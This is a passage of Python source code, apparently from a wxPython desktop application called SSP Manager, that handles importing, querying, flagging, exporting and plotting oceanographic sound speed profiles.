self.init_ui()
# update state
self.state = None
self._update_state(self.gui_state["CLOSED"])
# GUI timers (status bar and plots)
self.status_timer = TimerThread(self._update_status, timing=2)
self.status_timer.start()
self.plot_timer = TimerThread(self._update_plot, timing=30)
self.plot_timer.start()
self.SetMinSize(wx.Size(500, 300))
self.SetSize(wx.Size(1000, 550))
def init_ui(self):
favicon = wx.Icon(os.path.join(self.here, 'media', 'favicon.png'), wx.BITMAP_TYPE_PNG, 32, 32)
wx.Frame.SetIcon(self, favicon)
if os.name == 'nt':
try:
# This is needed to display the app icon on the taskbar on Windows 7
import ctypes
app_id = 'SSP Manager v.%s' % self.version
ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(app_id)
except AttributeError as e:
log.debug("Unable to change app icon: %s" % e)
self.Bind(wx.EVT_CLOSE, self.on_file_exit)
# add plots panel
self.p.plots = WxPlots(self)
self.p.plots.callback_right_click_down = self.on_context
# expand the panel to fit the whole app
self.GetSizer().Add(self.p.plots, 1, wx.EXPAND)
self.GetSizer().Fit(self)
self.Layout()
# register to receive wxPython SelectionEvents from a PlotPanel or PlotFrame
wxmpl.EVT_SELECTION(self, self.p.plots.GetId(), self._on_area_selected)
wxmpl.EVT_POINT(self, self.p.plots.GetId(), self._on_point_selected)
# Other graphical panels are instantiated and are only shown when requested
self.ref_monitor = refmonitor.RefMonitor(self.prj.km_listener)
self.geo_monitor = geomonitor.GeoMonitor(self.prj.km_listener)
self.settings_viewer = settingsviewer.SettingsViewer(self.prj.s)
self.inputs_viewer = userinputsviewer.UserInputsViewer(parent=self, ssp_user_inputs=self.prj.u)
def on_context(self, event):
""" Create and show a Context Menu """
# we don't want the context menu without data
if not self.prj.has_ssp_loaded:
return
id_ctx_reset_view = None
id_ctx_zoom = None
id_ctx_flag = None
id_ctx_unflag = None
id_ctx_insert = None
# only do this part the first time so the events are only bound once
if not hasattr(self, "id_ctx_reset_view"):
id_ctx_reset_view = wx.NewId()
self.Bind(wx.EVT_MENU, self.on_reset_view, id=id_ctx_reset_view)
id_ctx_zoom = wx.NewId()
self.Bind(wx.EVT_MENU, self.on_popup, id=id_ctx_zoom)
id_ctx_flag = wx.NewId()
self.Bind(wx.EVT_MENU, self.on_popup, id=id_ctx_flag)
id_ctx_unflag = wx.NewId()
self.Bind(wx.EVT_MENU, self.on_popup, id=id_ctx_unflag)
id_ctx_insert = wx.NewId()
self.Bind(wx.EVT_MENU, self.on_popup, id=id_ctx_insert)
# build the menu
context_menu = wx.Menu()
context_menu.Append(id_ctx_reset_view, "Reset view")
context_menu.AppendSeparator()
item_zoom = context_menu.Append(id_ctx_zoom, "Zoom",
"Zoom on plot by mouse selection", wx.ITEM_RADIO)
if self.PlotZoom.IsChecked():
item_zoom.Check(True)
item_flag = context_menu.Append(id_ctx_flag, "Flag",
"Flag samples on plot by mouse selection", wx.ITEM_RADIO)
if self.PlotFlag.IsChecked():
item_flag.Check(True)
item_unflag = context_menu.Append(id_ctx_unflag, "Unflag",
"Unflag samples on plot by mouse selection", wx.ITEM_RADIO)
if self.PlotUnflag.IsChecked():
item_unflag.Check(True)
item_insert = context_menu.Append(id_ctx_insert, "Insert",
"Insert a sample by mouse clicking", wx.ITEM_RADIO)
if self.PlotInsert.IsChecked():
item_insert.Check(True)
# show the popup menu
self.PopupMenu(context_menu)
context_menu.Destroy()
event.Skip()
def on_popup(self, event):
"""Print the label of the menu item selected"""
item_id = event.GetId()
menu = event.GetEventObject()
menu_item = menu.FindItemById(item_id)
if menu_item.GetLabel() == "Zoom":
event = wx.MenuEvent(wx.wxEVT_COMMAND_MENU_SELECTED, self.PlotZoom.GetId(), self.ProcessInspection)
wx.PostEvent(self, event)
self.PlotZoom.Check(True)
elif menu_item.GetLabel() == "Flag":
event = wx.MenuEvent(wx.wxEVT_COMMAND_MENU_SELECTED, self.PlotFlag.GetId(), self.ProcessInspection)
wx.PostEvent(self, event)
self.PlotFlag.Check(True)
elif menu_item.GetLabel() == "Unflag":
event = wx.MenuEvent(wx.wxEVT_COMMAND_MENU_SELECTED, self.PlotUnflag.GetId(), self.ProcessInspection)
wx.PostEvent(self, event)
self.PlotUnflag.Check(True)
elif menu_item.GetLabel() == "Insert":
event = wx.MenuEvent(wx.wxEVT_COMMAND_MENU_SELECTED, self.PlotInsert.GetId(), self.ProcessInspection)
wx.PostEvent(self, event)
self.PlotInsert.Check(True)
# ####### FILE ########
# Import
def on_file_import_castaway(self, evt):
self._open_data_file(Dicts.import_formats['CASTAWAY'])
def on_file_import_saiv(self, evt):
self._open_data_file(Dicts.import_formats['SAIV'])
def on_file_import_idronaut(self, evt):
self._open_data_file(Dicts.import_formats['IDRONAUT'])
def on_file_import_digibar_pro(self, evt):
self._open_data_file(Dicts.import_formats['DIGIBAR_PRO'])
def on_file_import_digibar_s(self, evt):
self._open_data_file(Dicts.import_formats['DIGIBAR_S'])
def on_file_import_sippican(self, evt):
self._open_data_file(Dicts.import_formats['SIPPICAN'])
def on_file_import_seabird(self, evt):
self._open_data_file(Dicts.import_formats['SEABIRD'])
def on_file_import_turo(self, evt):
self._open_data_file(Dicts.import_formats['TURO'])
def on_file_import_unb(self, evt):
self._open_data_file(Dicts.import_formats['UNB'])
def on_file_import_valeport_midas(self, evt):
self._open_data_file(Dicts.import_formats['VALEPORT_MIDAS'])
def on_file_import_valeport_monitor(self, evt):
self._open_data_file(Dicts.import_formats['VALEPORT_MONITOR'])
def on_file_import_valeport_minisvp(self, evt):
self._open_data_file(Dicts.import_formats['VALEPORT_MINI_SVP'])
def _open_data_file(self, input_format):
if not (input_format in Dicts.import_formats.values()):
raise SspError("unsupported import format: %s" % input_format)
if self.prj.has_ssp_loaded:
self.prj.clean_project()
self.clear_app()
try:
ext = Dicts.import_extensions[input_format]
except KeyError:
raise SspError("unsupported import extension format: %s" % input_format)
# retrieve the name of the format
name_format = [key for key, value in Dicts.import_formats.items() if value == input_format][0]
selection_filter = "%s files (*.%s,*.%s)|*.%s;*.%s|All File (*.*)|*.*" \
% (name_format, ext, ext.upper(), ext, ext.upper())
dlg = wx.FileDialog(self, "File selection", "", "", selection_filter, style=wx.FD_OPEN | wx.FD_CHANGE_DIR)
if dlg.ShowModal() != wx.ID_OK:
dlg.Destroy()
return
import_directory = dlg.GetDirectory()
import_file = dlg.GetFilename()
dlg.Destroy()
filename = os.path.join(import_directory, import_file)
try:
self.prj.open_file_format(filename, input_format, self.get_date, self.get_position)
except SspError as e:
dlg = wx.MessageDialog(None, e.message, "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal() # Show it
dlg.Destroy()
return
# set the new SSP for the refraction monitor
if self.ref_monitor:
self.ref_monitor.set_ssp(self.prj.ssp_data)
self.ref_monitor.set_corrector(0)
self._update_state(self.gui_state['OPEN'])
self._update_plot()
self.status_message = "Loaded %s" % self.prj.filename
# Query
def on_file_query_woa09(self, evt):
if not self.prj.woa09_atlas_loaded:
msg = "Functionality disabled: Failed on WOA2009 grid load"
dlg = wx.MessageDialog(None, msg, "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
if self.prj.has_ssp_loaded:
self.prj.clean_project()
self.clear_app()
msg = "User requested WOA09 synthetic cast"
log.info(msg)
latitude, longitude = self.get_position()
if (latitude is None) or (longitude is None):
log.info("not a valid position")
return
log.info("using position: %s, %s" % (longitude, latitude))
query_date = self.get_date()
if query_date is None:
log.info("not a valid date time")
return
log.info("using date time: %s" % query_date)
try:
woa_data, woa_min, woa_max = self.prj.woa09_atlas.query(latitude, longitude, query_date)
if woa_data is None:
log.info("unable to retrieve data")
return
except SspError:
msg = "Failed on WOA09 lookup"
dlg = wx.MessageDialog(None, msg, "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
log.info("got WOA SSP:\n%s" % woa_data)
self.prj.ssp_woa = woa_data
self.prj.ssp_woa_min = woa_min
self.prj.ssp_woa_max = woa_max
self.prj.ssp_data = copy.deepcopy(woa_data)
self.prj.filename = "%s_WOA09" % (self.prj.ssp_woa.date_time.strftime("%Y%m%d_%H%M%S"))
self.prj.u.filename_prefix = os.path.splitext(self.prj.filename)[0]
self.prj.has_ssp_loaded = True
self.prj.surface_speed_applied = False
self.prj.ssp_applied_depth = 0
self._update_plot()
self._update_state(self.gui_state['OPEN'])
self.status_message = "Synthetic WOA09 cast"
log.info("Synthetic WOA09 cast using pos: (%.6f, %.6f) and time: %s"
% (latitude, longitude, query_date))
def on_file_query_rtofs(self, evt):
if not self.prj.rtofs_atlas_loaded:
msg = "Functionality disabled: Failed on RTOFS grid load"
dlg = wx.MessageDialog(None, msg, "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
if self.prj.has_ssp_loaded:
self.prj.clean_project()
self.clear_app()
msg = "User requested RTOFS synthetic cast"
log.info(msg)
latitude, longitude = self.get_position()
if (latitude is None) or (longitude is None):
log.info("not a valid position")
return
log.info("using position: %s, %s" % (longitude, latitude))
query_date = self.get_date()
if query_date is None:
log.info("not a valid date time")
return
log.info("using date time: %s" % query_date)
try:
temp_ssp = self.prj.rtofs_atlas.query(latitude, longitude, query_date)
if temp_ssp is None:
log.info("empty result from RTOFS query")
return
except SspError:
msg = "Failed on RTOFS lookup"
dlg = wx.MessageDialog(None, msg, "Error", wx.OK | wx.ICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
self.prj.ssp_data = temp_ssp
try:
self.prj.ssp_woa, self.prj.ssp_woa_min, self.prj.ssp_woa_max = self.prj.woa09_atlas.query(latitude,
longitude,
query_date)
if self.prj.ssp_woa is None:
log.info("failure in performing WOA09 lookup")
except HyOError:
log.info("failure in performing WOA09 lookup")
self.prj.filename = "%s_RTOFS" % (self.prj.ssp_data.date_time.strftime("%Y%m%d_%H%M%S"))
self.prj.u.filename_prefix = os.path.splitext(self.prj.filename)[0]
self.prj.has_ssp_loaded = True
self.prj.surface_speed_applied = False
self.prj.ssp_applied_depth = 0
self._update_plot()
self._update_state(self.gui_state['OPEN'])
self.status_message = "Synthetic RTOFS cast"
log.info("Synthetic RTOFS cast using pos: (%.6f, %.6f) and time: %s"
% (latitude, longitude, query_date))
def on_file_query_sis(self, evt):
log.info("requesting profile from SIS")
if self.prj.has_ssp_loaded:
self.prj.clean_project()
self.clear_app()
# Need to request the current SVP cast from the clients prior. Take the first one that comes through.
self.prj.km_listener.ssp = None
for client in range(self.prj.s.client_list.num_clients):
log.info("testing client %s" % self.prj.s.client_list.clients[client].IP)
self.prj.ssp_recipient_ip = self.prj.s.client_list.clients[client].IP
self.prj.get_cast_from_sis()
if self.prj.km_listener.ssp:
break
if not self.prj.km_listener.ssp:
msg = "Unable to get SIS cast from any clients"
dlg = wx.MessageDialog(None, msg, "Acknowledge", wx.OK | wx.ICON_ERROR)
dlg.ShowModal() # Show it
dlg.Destroy()
return
log.info("got SSP from SIS: %s" % self.prj.km_listener.ssp)
latitude, longitude = self.get_position()
if (latitude is None) or (longitude is None):
log.info("not a valid position")
return
log.info("using position: %s, %s" % (longitude, latitude))
self.prj.ssp_data = self.prj.km_listener.ssp.convert_ssp()
self.prj.ssp_data.set_position(latitude, longitude)
self.prj.filename = "%s_SIS" % (self.prj.ssp_data.date_time.strftime("%Y%m%d_%H%M%S"))
self.prj.u.filename_prefix = os.path.splitext(self.prj.filename)[0]
self.prj.ssp_woa, self.prj.ssp_woa_min, self.prj.ssp_woa_max = \
self.prj.woa09_atlas.query(latitude, longitude, self.prj.ssp_data.date_time)
if self.prj.ssp_woa is not None:
self.prj.ssp_data.replace_samples(self.prj.ssp_woa, 'salinity')
self.prj.ssp_data.replace_samples(self.prj.ssp_woa, 'temperature')
self.prj.has_ssp_loaded = True
self.prj.surface_speed_applied = False
self.prj.ssp_applied_depth = 0
self._update_plot()
self._update_state(self.gui_state['OPEN'])
self.status_message = "Retrieved SIS current cast, user chose %.2f %.2f for position, cast date is %s" % (
latitude, longitude, self.prj.ssp_data.date_time)
# Export
def on_file_export_asvp(self, evt):
self.prj.u.switch_export_format("ASVP")
def on_file_export_csv(self, evt):
self.prj.u.switch_export_format("CSV")
def on_file_export_pro(self, evt):
self.prj.u.switch_export_format("PRO")
def on_file_export_elac(self, evt):
self.prj.u.switch_export_format("ELAC")
def on_file_export_hips(self, evt):
self.prj.u.switch_export_format("HIPS")
def on_file_export_ixblue(self, evt):
self.prj.u.switch_export_format("IXBLUE")
def on_file_export_unb(self, evt):
self.prj.u.switch_export_format("UNB")
def on_file_export_vel(self, evt):
self.prj.u.switch_export_format("VEL")
def on_file_export_cast(self, evt):
"""Manage the user export"""
# check if at least a format was selected
if self.prj.count_export_formats() == 0:
msg = "Please select at least a file format for export!"
dlg = wx.MessageDialog(None, msg, "Cast export", wx.OK | wx.ICON_QUESTION)
dlg.ShowModal()
dlg.Destroy()
return
# set the export folder and filename
if self.prj.s.user_export_prompt_filename:
dlg = wx.FileDialog(self, "Specify an output file prefix", "", "", "All Files (*.*)|*.*",
style=wx.FD_SAVE | wx.FD_CHANGE_DIR)
if dlg.ShowModal() == wx.ID_CANCEL:
dlg.Destroy()
return
dlg.Destroy()
self.prj.u.user_export_directory = dlg.GetDirectory()
filename = dlg.GetFilename()
self.prj.u.user_filename_prefix = os.path.splitext(filename)[0]
else:
# Accommodate files that are imported from an existing file (and have a fully qualified path name
# in the self.prj.filename variable AND accommodate files that are generated in memory (e.g. WOA query)
# and have a pathless filename in self.prj.filename.
self.prj.u.user_export_directory = self.prj.get_output_folder()
filename = os.path.basename(self.prj.filename)
self.prj.u.user_filename_prefix = os.path.splitext(filename)[0]
# actually do the export
self.prj.formats_export("USER")
# open export folder
Helper.explore_folder(self.prj.u.user_export_directory)
# clear
def on_file_clear(self, evt):
if self.prj.has_sippican_to_process or self.prj.has_mvp_to_process:
msg = "You haven't processed/delivered " + self.prj.filename \
+ " yet!\nAre you sure you want to close this file?"
dlg = wx.MessageDialog(None, msg, "Confirm File Close", wx.OK | wx.CANCEL | wx.ICON_QUESTION)
result = dlg.ShowModal()
dlg.Destroy()
if result == wx.ID_CANCEL:
return
self.prj.clean_project()
self.clear_app()
def clear_app(self):
self._update_plot()
self._update_state(self.gui_state['CLOSED'])
self.status_message = ""
def on_file_exit(self, evt):
dlg = wx.MessageDialog(self, "Do you really want to close this application?", "Confirm Exit",
wx.OK | wx.CANCEL | wx.ICON_QUESTION)
result = dlg.ShowModal()
dlg.Destroy()
if result == wx.ID_CANCEL:
return
# Kill all gui tools
if self.ref_monitor:
log.info("killing refraction monitor")
self.ref_monitor.OnExit()
if self.geo_monitor:
log.info("killing geo monitor")
self.geo_monitor.OnExit()
if self.inputs_viewer:
log.info("killing user inputs viewer")
self.inputs_viewer.OnExit()
if self.settings_viewer:
log.info("killing settings viewer")
self.settings_viewer.OnExit()
if self.status_timer:
log.info("stopping status timer")
if self.status_timer.is_alive():
self.status_timer.stop()
if self.plot_timer:
log.info("stopping plot timer")
if self.plot_timer.is_alive():
self.plot_timer.stop()
self.prj.release()
time.sleep(2) # to be sure that all the threads stop
self.Destroy() # Close the frame.
log.info("exit done")
# ####### View ########
def on_reset_view(self, evt):
self.p.has_zoom_applied = False
self._update_plot()
def on_view_hide_flagged(self, evt):
self.p.display_flagged = not self.p.display_flagged
self._update_plot()
def on_view_hide_woa(self, evt):
if not self.prj.has_ssp_loaded:
return
self.p.display_woa = not self.p.display_woa
self._update_plot()
def on_view_hide_depth(self, evt):
self.p.display_depth = not self.p.display_depth
self._update_plot()
def _reset_view_limits(self):
if self.p.has_zoom_applied or (not self.prj.has_ssp_loaded):
return
good_pts = (self.prj.ssp_data.data[Dicts.idx['flag'], :] == 0)
if self.p.display_flagged:
good_pts[:] = True
self.p.min_speed = min(self.prj.ssp_data.data[Dicts.idx['speed'], good_pts])
self.p.max_speed = max(self.prj.ssp_data.data[Dicts.idx['speed'], good_pts])
self.p.min_temp = min(self.prj.ssp_data.data[Dicts.idx['temperature'], good_pts])
self.p.max_temp = max(self.prj.ssp_data.data[Dicts.idx['temperature'], good_pts])
self.p.min_sal = min(self.prj.ssp_data.data[Dicts.idx['salinity'], good_pts])
self.p.max_sal = max(self.prj.ssp_data.data[Dicts.idx['salinity'], good_pts])
self.p.max_depth = min(self.prj.ssp_data.data[Dicts.idx['depth'], good_pts])
self.p.min_depth = max(self.prj.ssp_data.data[Dicts.idx['depth'], good_pts])
if self.prj.surface_sound_speed:
self.p.min_speed = min(self.p.min_speed, self.prj.surface_sound_speed)
self.p.max_speed = max(self.p.max_speed, self.prj.surface_sound_speed)
if self.p.display_woa and self.prj.ssp_woa:
self.p.min_depth = max(self.p.min_depth,
max(self.prj.ssp_woa.data[Dicts.idx['depth'], :]))
self.p.max_depth = min(self.p.max_depth,
min(self.prj.ssp_woa.data[Dicts.idx['depth'], :]))
self.p.min_speed = min(self.p.min_speed,
min(self.prj.ssp_woa.data[Dicts.idx['speed'], :]))
self.p.max_speed = max(self.p.max_speed,
max(self.prj.ssp_woa.data[Dicts.idx['speed'], :]))
self.p.min_temp = min(self.p.min_temp,
min(self.prj.ssp_woa.data[Dicts.idx['temperature'], :]))
self.p.max_temp = max(self.p.max_temp,
max(self.prj.ssp_woa.data[Dicts.idx['temperature'], :]))
self.p.min_sal = min(self.p.min_sal,
min(self.prj.ssp_woa.data[Dicts.idx['salinity'], :]))
self.p.max_sal = max(self.p.max_sal,
max(self.prj.ssp_woa.data[Dicts.idx['salinity'], :]))
if self.prj.ssp_woa_min and self.prj.ssp_woa_max:
if self.prj.ssp_woa_min.data.shape[1] > 0:
self.p.min_depth = max(self.p.min_depth,
max(self.prj.ssp_woa_min.data[Dicts.idx['depth'], :]))
self.p.max_depth = min(self.p.max_depth,
min(self.prj.ssp_woa_min.data[Dicts.idx['depth'], :]))
self.p.min_speed = min(self.p.min_speed,
min(self.prj.ssp_woa_min.data[Dicts.idx['speed'], :]))
self.p.max_speed = max(self.p.max_speed,
max(self.prj.ssp_woa_min.data[Dicts.idx['speed'], :]))
self.p.min_temp = min(self.p.min_temp,
min(self.prj.ssp_woa_min.data[Dicts.idx['temperature'],
:]))
self.p.max_temp = max(self.p.max_temp,
max(self.prj.ssp_woa_min.data[Dicts.idx['temperature'],
:]))
self.p.min_sal = min(self.p.min_sal,
min(self.prj.ssp_woa_min.data[Dicts.idx['salinity'], :]))
self.p.max_sal = max(self.p.max_sal,
max(self.prj.ssp_woa_min.data[Dicts.idx['salinity'], :]))
if self.prj.ssp_woa_max.data.shape[1] > 0:
self.p.min_depth = max(self.p.min_depth,
max(self.prj.ssp_woa_max.data[Dicts.idx['depth'], :]))
self.p.max_depth = min(self.p.max_depth,
min(self.prj.ssp_woa_max.data[Dicts.idx['depth'], :]))
self.p.min_speed = min(self.p.min_speed,
min(self.prj.ssp_woa_max.data[Dicts.idx['speed'], :]))
self.p.max_speed = max(self.p.max_speed,
max(self.prj.ssp_woa_max.data[Dicts.idx['speed'], :]))
self.p.min_temp = min(self.p.min_temp,
min(self.prj.ssp_woa_max.data[Dicts.idx['temperature'],
:]))
self.p.max_temp = max(self.p.max_temp,
max(self.prj.ssp_woa_max.data[Dicts.idx['temperature'],
:]))
self.p.min_sal = min(self.p.min_sal,
min(self.prj.ssp_woa_max.data[Dicts.idx['salinity'], :]))
self.p.max_sal = max(self.p.max_sal,
max(self.prj.ssp_woa_max.data[Dicts.idx['salinity'], :]))
if self.p.display_reference and self.prj.ssp_reference:
self.p.min_depth = max(self.p.min_depth,
max(self.prj.ssp_reference.data[Dicts.idx['depth'], :]))
self.p.max_depth = min(self.p.max_depth,
min(self.prj.ssp_reference.data[Dicts.idx['depth'], :]))
self.p.min_speed = min(self.p.min_speed,
min(self.prj.ssp_reference.data[Dicts.idx['speed'], :]))
self.p.max_speed = max(self.p.max_speed,
max(self.prj.ssp_reference.data[Dicts.idx['speed'], :]))
self.p.min_temp = min(self.p.min_temp,
min(self.prj.ssp_reference.data[Dicts.idx['temperature'], :]))
self.p.max_temp = max(self.p.max_temp,
max(self.prj.ssp_reference.data[Dicts.idx['temperature'], :]))
self.p.min_sal = min(self.p.min_sal,
min(self.prj.ssp_reference.data[Dicts.idx['salinity'], :]))
self.p.max_sal = max(self.p.max_sal,
max(self.prj.ssp_reference.data[Dicts.idx['salinity'], :]))
if self.p.sel_mode == self.p.sel_modes["Insert"]:
if self.prj.u.user_depth:
self.p.min_depth = max(self.p.min_depth, self.prj.u.user_depth)
self.p.max_depth = min(self.p.max_depth, self.prj.u.user_depth)
if self.prj.u.user_speed:
self.p.min_speed = min(self.p.min_speed, self.prj.u.user_speed)
self.p.max_speed = max(self.p.max_speed, self.prj.u.user_speed)
if self.prj.u.user_temperature:
self.p.min_temp = min(self.p.min_temp, self.prj.u.user_temperature)
self.p.max_temp = max(self.p.max_temp, self.prj.u.user_temperature)
if self.prj.u.user_salinity:
self.p.min_sal = min(self.p.min_sal, self.prj.u.user_salinity)
self.p.max_sal = max(self.p.max_sal, self.prj.u.user_salinity)
view_range = self.p.max_depth - self.p.min_depth
if view_range == 0.0:
view_range = 5.0
# We let the depth scale be 25% larger to allow the user to extend
self.p.min_depth -= 0.25 * view_range
self.p.max_depth = -1
view_range = self.p.max_speed - self.p.min_speed
if view_range == 0.0:
view_range = 5.0
self.p.min_speed -= 0.05 * view_range
self.p.max_speed += 0.05 * view_range
view_range = self.p.max_temp - self.p.min_temp
if view_range == 0.0:
view_range = 5.0
self.p.min_temp -= 0.05 * view_range
self.p.max_temp += 0.05 * view_range
view_range = self.p.max_sal - self.p.min_sal
if view_range == 0.0:
view_range = 5.0
self.p.min_sal -= 0.05 * view_range
self.p.max_sal += 0.05 * view_range
# msg = "View limits:\n" \
# "- depth: %s -> %s\n" \
# "- speed: %s -> %s" % (self.p.min_depth, self.p.max_depth, self.p.min_speed, self.p.max_speed)
# log.info(msg)
# ####### Plot ######
def on_plot_zoom(self, evt):
self.prj.u.inspection_mode = Dicts.inspections_mode['Zoom'] # zoom mode
self.prj.u.clear_user_samples()
self.p.sel_mode = self.p.sel_modes["Zoom"]
self._update_plot()
log.info("inspection mode: zoom")
def on_plot_flag(self, evt):
self.prj.u.inspection_mode = Dicts.inspections_mode['Flag'] # flag data
self.prj.u.clear_user_samples()
self.p.sel_mode = self.p.sel_modes["Flag"]
self._update_plot()
log.info("flag interaction: active")
def on_plot_unflag(self, evt):
self.prj.u.inspection_mode = Dicts.inspections_mode['Unflag'] # unflag data
self.prj.u.clear_user_samples()
self.p.sel_mode = self.p.sel_modes["Flag"]
self._update_plot()
log.info("unflag interaction: active")
def on_plot_insert(self, evt):
self.prj.u.inspection_mode = Dicts.inspections_mode['Insert'] # insert data
self.prj.u.clear_user_samples()
self.p.sel_mode = self.p.sel_modes["Insert"]
self._update_plot()
log.info("insert interaction: active")
def _on_point_selected(self, evt):
if self.p.sel_mode != self.p.sel_modes["Insert"]:
return
log.info("point selection: %s, %s" % (evt.xdata, evt.ydata))
x, y = evt.xdata, evt.ydata
if evt.axes == self.p.speed_axes:
if self.prj.u.user_salinity and self.prj.u.user_temperature and self.prj.u.user_depth:
self.prj.u.user_speed = oceanography.soundspeed(self.prj.u.user_depth, self.prj.u.user_temperature,
self.prj.u.user_salinity, self.prj.ssp_data.latitude)
msg = "User manually inserted temperature %f and salinity %f at depth %f, calculated sound speed %f" \
% (self.prj.u.user_temperature, self.prj.u.user_salinity, self.prj.u.user_depth,
self.prj.u.user_speed)
else:
self.prj.u.user_speed = x
self.prj.u.user_depth = y
self.prj.u.user_temperature = None
self.prj.u.user_salinity = None
msg = "User manually inserted sound speed %f at depth %f" \
% (self.prj.u.user_speed, self.prj.u.user_depth)
self.prj.ssp_data.insert_sample(depth=self.prj.u.user_depth, speed=self.prj.u.user_speed,
temperature=self.prj.u.user_temperature, salinity=self.prj.u.user_salinity,
source=Dicts.source_types['User'])
log.info(msg)
self.prj.u.clear_user_samples()
elif evt.axes == self.p.temp_axes:
self.prj.u.user_temperature = x
self.prj.u.user_depth = y
elif evt.axes == self.p.sal_axes:
self.prj.u.user_salinity = x
self.prj.u.user_depth = y
self._update_plot()
def _on_area_selected(self, evt):
if (self.p.sel_mode != self.p.sel_modes["Flag"]) and (self.p.sel_mode != self.p.sel_modes["Zoom"]):
return
log.info("area selection: %s, %s / %s, %s"
% (evt.x1data, evt.y1data, evt.x2data, evt.y2data))
x1, y1 = evt.x1data, evt.y1data
x2, y2 = evt.x2data, evt.y2data
if self.p.sel_mode == self.p.sel_modes["Flag"]:
# Deal with case of user selecting points
if evt.axes == self.p.speed_axes:
self.prj.ssp_data.toggle_flag([y1, y2], [x1, x2], 'speed', self.prj.u.inspection_mode)
elif evt.axes == self.p.temp_axes:
self.prj.ssp_data.toggle_flag([y1, y2], [x1, x2], 'temperature', self.prj.u.inspection_mode)
elif evt.axes == self.p.sal_axes:
self.prj.ssp_data.toggle_flag([y1, y2], [x1, x2], 'salinity', self.prj.u.inspection_mode)
elif self.p.sel_mode == self.p.sel_modes["Zoom"]:
# Deal with case of zooming in
if evt.axes == self.p.speed_axes:
self.p.min_speed = x1
self.p.max_speed = x2
elif evt.axes == self.p.temp_axes:
self.p.min_temp = x1
self.p.max_temp = x2
elif evt.axes == self.p.sal_axes:
self.p.min_sal = x1
self.p.max_sal = x2
self.p.min_depth = y1
self.p.max_depth = y2
self.p.has_zoom_applied = True
# In all cases, we update the plots accordingly
self._update_plot()
def _update_plot(self):
"""Update the plots"""
# log.info("updating plots")
if self.prj.has_sippican_to_process or self.prj.has_mvp_to_process:
if self.state == self.gui_state["CLOSED"]:
self._update_state(self.gui_state["OPEN"])
self._reset_view_limits()
try:
self._update_plot_worker()
except PyDeadObjectError:
log.info("dead object")
except IndexError:
log.info("index error during plot updating")
except KeyError:
log.info("key error during plot updating")
except ValueError:
log.info("value error during plot updating")
except AttributeError:
log.info("attribute error during plot updating")
except RuntimeError:
log.info("runtime error during plot updating")
def _update_plot_worker(self):
"""Update the plots"""
self.p.plots.get_figure().clf()
if not self.prj.has_ssp_loaded:
self.p.plots.draw()
return
if self.prj.server.is_running:
bg_color = '#32cd32' # green
elif self.prj.has_sippican_to_process or self.prj.has_mvp_to_process:
bg_color = '#F23047' # red
else:
bg_color = 'w'
# Fresh axes every time
self.p.speed_axes = self.p.plots.get_figure().add_subplot(131, axisbg=bg_color)
self.p.speed_axes.invert_yaxis()
self.p.temp_axes = self.p.plots.get_figure().add_subplot(132, sharey=self.p.speed_axes, axisbg=bg_color)
self.p.temp_axes.invert_yaxis()
self.p.sal_axes = self.p.plots.get_figure().add_subplot(133, sharey=self.p.speed_axes, axisbg=bg_color)
self.p.sal_axes.invert_yaxis()
if self.prj.has_ssp_loaded and self.p.display_woa and self.prj.ssp_woa:
# Plot WOA2009 profile for context if desired, but only if we have a current SV loaded
self.p.speed_axes.plot(self.prj.ssp_woa.data[Dicts.idx['speed'], :],
self.prj.ssp_woa.data[Dicts.idx['depth'], :], 'm--')
self.p.speed_axes.hold(True)
self.p.temp_axes.plot(self.prj.ssp_woa.data[Dicts.idx['temperature'], :],
self.prj.ssp_woa.data[Dicts.idx['depth'], :], 'm--')
self.p.temp_axes.hold(True)
self.p.sal_axes.plot(self.prj.ssp_woa.data[Dicts.idx['salinity'], :],
self.prj.ssp_woa.data[Dicts.idx['depth'], :], 'm--')
self.p.sal_axes.hold(True)
if self.prj.ssp_woa_max and self.prj.ssp_woa_min:
self.p.speed_axes.plot(self.prj.ssp_woa_min.data[Dicts.idx['speed'], :],
self.prj.ssp_woa_min.data[Dicts.idx['depth'], :], 'm--')
self.p.temp_axes.plot(self.prj.ssp_woa_min.data[Dicts.idx['temperature'], :],
self.prj.ssp_woa_min.data[Dicts.idx['depth'], :], 'm--')
self.p.sal_axes.plot(self.prj.ssp_woa_min.data[Dicts.idx['salinity'], :],
self.prj.ssp_woa_min.data[Dicts.idx['depth'], :], 'm--')
self.p.speed_axes.plot(self.prj.ssp_woa_max.data[Dicts.idx['speed'], :],
self.prj.ssp_woa_max.data[Dicts.idx['depth'], :], 'm--')
self.p.temp_axes.plot(self.prj.ssp_woa_max.data[Dicts.idx['temperature'], :],
self.prj.ssp_woa_max.data[Dicts.idx['depth'], :], 'm--')
self.p.sal_axes.plot(self.prj.ssp_woa_max.data[Dicts.idx['salinity'], :],
self.prj.ssp_woa_max.data[Dicts.idx['depth'], :], 'm--')
if self.p.display_reference and self.prj.ssp_reference:
# Plot Reference profile
good_pts = (self.prj.ssp_reference.data[Dicts.idx['flag'], :] == 0)
self.p.speed_axes.plot(self.prj.ssp_reference.data[Dicts.idx['speed'], good_pts],
self.prj.ssp_reference.data[Dicts.idx['depth'], good_pts], 'y')
if self.prj.has_ssp_loaded:
self.p.speed_axes.plot(self.prj.ssp_reference.data[Dicts.idx['speed'], good_pts],
self.prj.ssp_reference.data[Dicts.idx['depth'], good_pts],
'y', linewidth=3.0)
self.p.speed_axes.hold(True)
self.p.temp_axes.plot(self.prj.ssp_reference.data[Dicts.idx['temperature'], good_pts],
self.prj.ssp_reference.data[Dicts.idx['depth'], good_pts], 'y')
if self.prj.has_ssp_loaded:
self.p.temp_axes.plot(self.prj.ssp_reference.data[Dicts.idx['temperature'], good_pts],
self.prj.ssp_reference.data[Dicts.idx['depth'], good_pts],
'y', linewidth=3.0)
self.p.temp_axes.hold(True)
self.p.sal_axes.plot(self.prj.ssp_reference.data[Dicts.idx['salinity'], good_pts],
self.prj.ssp_reference.data[Dicts.idx['depth'], good_pts], 'y')
if self.prj.has_ssp_loaded:
self.p.sal_axes.plot(self.prj.ssp_reference.data[Dicts.idx['salinity'], good_pts],
self.prj.ssp_reference.data[Dicts.idx['depth'], good_pts],
'y', linewidth=3.0)
self.p.sal_axes.hold(True)
